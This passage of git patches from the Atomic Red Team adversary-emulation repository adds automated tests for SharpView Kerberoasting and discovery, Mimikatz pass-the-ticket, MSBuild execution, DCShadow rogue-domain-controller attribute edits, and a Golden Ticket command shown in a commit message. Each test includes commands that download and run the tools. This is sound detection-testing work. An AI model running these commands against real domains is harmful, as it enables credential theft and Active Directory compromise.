b/atomics/Indexes/index.yaml index 246a2d24..cac1c592 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47701,6 +47701,48 @@ discovery: netstat who -a name: sh + - name: System Discovery using SharpView + auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 + description: "Get a listing of network connections, domains, domain users, and + etc. \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon + successful execution, cmd.exe will execute sharpview.exe . Results + will output via stdout.\n" + supported_platforms: + - windows + input_arguments: + SharpView_url: + description: sharpview download URL + type: url + default: https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true + SharpView: + description: Path of the executable opensource redteam tool used for the + performing this atomic. + type: path + default: PathToAtomicsFolder\T1049\bin\SharpView.exe + syntax: + description: Arguements method used along with SharpView to get listing + of network connections, domains, domain users, and etc. + type: String + default: "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" + \n" + dependency_executor_name: powershell + dependencies: + - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) + +' + prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null + Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" + executor: + name: powershell + elevation_required: true + command: | + $syntaxList = #{syntax} + foreach ($syntax in $syntaxList) { + #{SharpView} $syntax -} T1033: technique: created: '2017-05-31T21:30:35.733Z' diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index a1b312df..414e5e25 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -14,6 +14,8 @@ Utilities and commands that acquire this information include [netstat](https://a - [Atomic Test #3 - System Network Connections Discovery Linux & MacOS](#atomic-test-3---system-network-connections-discovery-linux--macos) +- [Atomic Test #4 - System Discovery using SharpView](#atomic-test-4---system-discovery-using-sharpview) +
@@ -107,4 +109,52 @@ echo "Install netstat on the machine."; exit 1; +
+
+ +## Atomic Test #4 - System Discovery using SharpView +Get a listing of network connections, domains, domain users, and etc. +sharpview.exe located in the bin folder, an opensource red-team tool. +Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| +| SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe| +| syntax | Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc. | String | "Invoke-ACLScanner", "Invoke-Kerberoast", "Find-DomainShare"| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$syntaxList = #{syntax} +foreach ($syntax in $syntaxList) { +#{SharpView} $syntax -} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{SharpView}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null +Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" +``` + + + +
From 139ed0927e740ad10fde1d7df296dedd6c25f765 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 5 Jan 2021 17:30:39 -0600 Subject: [PATCH 034/131] Update T1550.003.yaml (#1355) Added prereqs to test 1 --- atomics/T1550.003/T1550.003.yaml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index c7c4b591..e3539161 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -16,7 +16,23 @@ atomic_tests: description: domain type: string default: atomic.local + mimikatz_exe: + description: Path of the Mimikatz binary + type: string + default: PathToAtomicsFolder\T1550.003\bin\mimikatz.exe + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz must exist on disk at specified location (#{mimikatz_exe}) + prereq_command: | + if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force + New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null + Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force executor: command: | - mimikatz # kerberos::ptt #{user_name}@#{domain} - name: command_prompt \ No newline at end of file + #{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain} + name: command_prompt From 4c655f1e84f232e54b5c7f9007a4b683414c6c33 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 5 Jan 2021 23:31:24 +0000 Subject: [PATCH 035/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 40 ++++++++++++++++++++++++++++++---- atomics/T1550.003/T1550.003.md | 19 +++++++++++++++- 2 files changed, 54 insertions(+), 5 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index cac1c592..87949cff 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -35546,10 +35546,26 @@ defense-evasion: description: domain type: string default: atomic.local - executor: - command: 'mimikatz # kerberos::ptt #{user_name}@#{domain} + mimikatz_exe: + description: Path of the Mimikatz binary + type: string + default: PathToAtomicsFolder\T1550.003\bin\mimikatz.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ' + prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force + New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null + Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force + executor: + command: "#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}\n" name: command_prompt T1556.002: technique: @@ -55464,10 +55480,26 @@ lateral-movement: description: domain type: string default: atomic.local - executor: - command: 'mimikatz # kerberos::ptt #{user_name}@#{domain} + mimikatz_exe: + description: Path of the Mimikatz binary + type: string + default: PathToAtomicsFolder\T1550.003\bin\mimikatz.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ' + prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} + +' + get_prereq_command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force + New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null + Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force + executor: + command: "#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain}\n" name: command_prompt T1563.002: technique: diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 96a3cf61..e9f49896 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -28,18 +28,35 @@ Similar to PTH, but attacking Kerberos |------|-------------|------|---------------| | user_name | username | string | Administrator| | domain | domain | string | atomic.local| +| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1550.003\bin\mimikatz.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -mimikatz # kerberos::ptt #{user_name}@#{domain} +#{mimikatz_exe} # kerberos::ptt #{user_name}@#{domain} ``` +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" +Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force +New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null +Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force +``` + +
From 8c4eb625321b3265ab139a6376515c6055e4aafa Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Tue, 5 Jan 2021 16:34:35 -0700 Subject: [PATCH 036/131] Update T1127.001.yaml (#1356) Modified Atomic Test to allow for more granular control of input arguments. Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> Co-authored-by: Carrie Roberts --- atomics/T1127.001/T1127.001.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/atomics/T1127.001/T1127.001.yaml b/atomics/T1127.001/T1127.001.yaml index a8b9221f..bfa8383d 100644 --- a/atomics/T1127.001/T1127.001.yaml +++ b/atomics/T1127.001/T1127.001.yaml @@ -12,6 +12,14 @@ atomic_tests: description: Location of the project file type: Path default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj + msbuildpath: + description: Default location of MSBuild + type: Path + default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 + msbuildname: + description: Default name of MSBuild + type: Path + default: msbuild.exe dependency_executor_name: powershell dependencies: - description: | @@ -23,6 +31,5 @@ atomic_tests: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" executor: command: | - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} + #{msbuildpath}\#{msbuildname} #{filename} name: command_prompt - From 91e05be201872f6edbbc4c76ad6e4e3e9884e782 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 5 Jan 2021 23:34:56 +0000 Subject: [PATCH 037/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 12 +++++++++--- atomics/T1127.001/T1127.001.md | 4 +++- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 87949cff..1e8458bf 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -33153,6 +33153,14 @@ defense-evasion: description: Location of the project file type: Path default: PathToAtomicsFolder\T1127.001\src\T1127.001.csproj + msbuildpath: + description: Default location of MSBuild + type: Path + default: C:\Windows\Microsoft.NET\Framework\v4.0.30319 + msbuildname: + description: Default name of MSBuild + type: Path + default: msbuild.exe dependency_executor_name: powershell dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) @@ -33165,9 +33173,7 @@ defense-evasion: New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" executor: - command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} - -' + command: "#{msbuildpath}\\#{msbuildname} #{filename}\n" name: command_prompt T1134.003: technique: diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 5be28313..3739b39d 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -23,13 +23,15 @@ Executes the code in a project file using. C# Example | Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\T1127.001.csproj| +| msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319| +| msbuildname | Default name of MSBuild | Path | msbuild.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} +#{msbuildpath}\#{msbuildname} #{filename} ``` From 4064764c1793593bea621197c88f3515a653262a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:20:11 +0100 Subject: [PATCH 038/131] T1207: automate test for DCShadow (#1350) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin Co-authored-by: Zakaria Addi --- atomics/T1207/T1207.yaml | 73 ++++++++++++++++++++++++++++++++++++---- 1 file changed, 66 insertions(+), 7 deletions(-) diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index 535b36ea..cc46cb0f 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml @@ -4,17 +4,76 @@ atomic_tests: - name: DCShadow - Mimikatz auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 description: | - Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller + Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) + + It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with: + Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount + + Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. + The easiest is to run elevated and as a Domain Admin user. supported_platforms: - windows + input_arguments: + user: + description: Targeted user (for machine account do not forget to add final '$') + type: string + default: CLIENT1$ + mimikatz_path: + description: Mimikatz windows executable + type: path + default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: | + PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) + prereq_command: | + if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force executor: - steps: | - 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. - 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. - 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480 - 4. lsadump::dcshadow /push - name: manual + name: powershell + elevation_required: true + command: | + # starting fake DC server, as SYSTEM (required) + $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" + Remove-Item $dc_output_file -ErrorAction Ignore + $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" + $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" + # wait for fake DC server to be ready... + Start-Sleep -Seconds 5 + + # server ready, so trigger replication (push) and wait until it finished + & #{mimikatz_path} "lsadump::dcshadow /push" "exit" + + Write-Host "`nWaiting for fake DC server to return" + Wait-Process $dc + + Write-Host "`nOutput from fake DC server:" + Get-Content $dc_output_file + Remove-Item $dc_output_file -ErrorAction Ignore + + Write-Host "End of DCShadow" + cleanup_command: | + Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore \ No newline at end of file From ccb97235c47a85911b33534e9646fc2bac09f90b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 18:20:33 +0000 Subject: [PATCH 039/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/index.yaml | 79 +++++++++++++++++-- atomics/T1207/T1207.md | 78 ++++++++++++++++-- 4 files changed, 146 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ec371714..cfd03dde 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -469,7 +469,7 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt -defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,manual +defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 70c42fb0..90800cd4 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -274,7 +274,7 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt -defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,manual +defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1e8458bf..41a8d574 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -37777,19 +37777,84 @@ defense-evasion: - name: DCShadow - Mimikatz auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 description: | - Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller + Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) + + It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with: + Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount + + Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. + The easiest is to run elevated and as a Domain Admin user. supported_platforms: - windows + input_arguments: + user: + description: Targeted user (for machine account do not forget to add final + '$') + type: string + default: CLIENT1$ + mimikatz_path: + description: Mimikatz windows executable + type: path + default: "$env:TEMP\\mimikatz\\x64\\mimikatz.exe" + psexec_path: + description: Path to PsExec + type: string + default: C:\PSTools\PsExec.exe + dependency_executor_name: powershell + dependencies: + - description: 'Mimikatz executor must exist on disk and at specified location + (#{mimikatz_path}) + +' + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + - description: 'PsExec tool from Sysinternals must exist on disk at specified + location (#{psexec_path}) + +' + prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} + +' + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" + Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force + New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null + Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force executor: - steps: | - 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. - 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. - 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480 - 4. lsadump::dcshadow /push - name: manual + name: powershell + elevation_required: true + command: | + # starting fake DC server, as SYSTEM (required) + $dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" + Remove-Item $dc_output_file -ErrorAction Ignore + $mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" + $dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" + + # wait for fake DC server to be ready... + Start-Sleep -Seconds 5 + + # server ready, so trigger replication (push) and wait until it finished + & #{mimikatz_path} "lsadump::dcshadow /push" "exit" + + Write-Host "`nWaiting for fake DC server to return" + Wait-Process $dc + + Write-Host "`nOutput from fake DC server:" + Get-Content $dc_output_file + Remove-Item $dc_output_file -ErrorAction Ignore + + Write-Host "End of DCShadow" + cleanup_command: Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore T1014: technique: id: attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index dd818ba3..83588369 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -14,24 +14,90 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz -Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller +Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) +It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with: +Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount + +Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. +The easiest is to run elevated and as a Domain Admin user. + **Supported Platforms:** Windows -#### Run it with these steps! -1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. -2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. -3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480 -4. lsadump::dcshadow /push +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| user | Targeted user (for machine account do not forget to add final '$') | string | CLIENT1$| +| mimikatz_path | Mimikatz windows executable | path | $env:TEMP\mimikatz\x64\mimikatz.exe| +| psexec_path | Path to PsExec | string | C:\PSTools\PsExec.exe| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +# starting fake DC server, as SYSTEM (required) +$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log" +Remove-Item $dc_output_file -ErrorAction Ignore +$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{user} /attribute:badpwdcount /value:9999`" `"exit`"" +$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam" + +# wait for fake DC server to be ready... +Start-Sleep -Seconds 5 + +# server ready, so trigger replication (push) and wait until it finished +& #{mimikatz_path} "lsadump::dcshadow /push" "exit" + +Write-Host "`nWaiting for fake DC server to return" +Wait-Process $dc + +Write-Host "`nOutput from fake DC server:" +Get-Content $dc_output_file +Remove-Item $dc_output_file -ErrorAction Ignore + +Write-Host "End of DCShadow" +``` + +#### Cleanup Commands: +```powershell +Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore +``` +#### Dependencies: Run with `powershell`! +##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) +##### Check Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +$mimikatz_path = cmd /c echo #{mimikatz_path} +Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" +Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force +New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null +Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force +``` +##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" +Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force +New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null +Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force +``` From d50239ff5721d7bf967a1c96985e314585ade2fa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Cl=C3=A9ment=20Notin?= Date: Wed, 6 Jan 2021 19:35:14 +0100 Subject: [PATCH 040/131] T1558.001: add test "Golden ticket" (#1351) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * T1558.001: add test "Golden ticket" Co-authored-by: Zakaria Addi Co-authored-by: Clément Notin * Add support for default domain SID (one less parameter to specify) With default: invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt With specific SID ("toto"): invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" } [...] mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt Co-authored-by: Zakaria Addi --- atomics/T1558.001/T1558.001.yaml | 100 +++++++++++++++++++++++++++++++ 1 file changed, 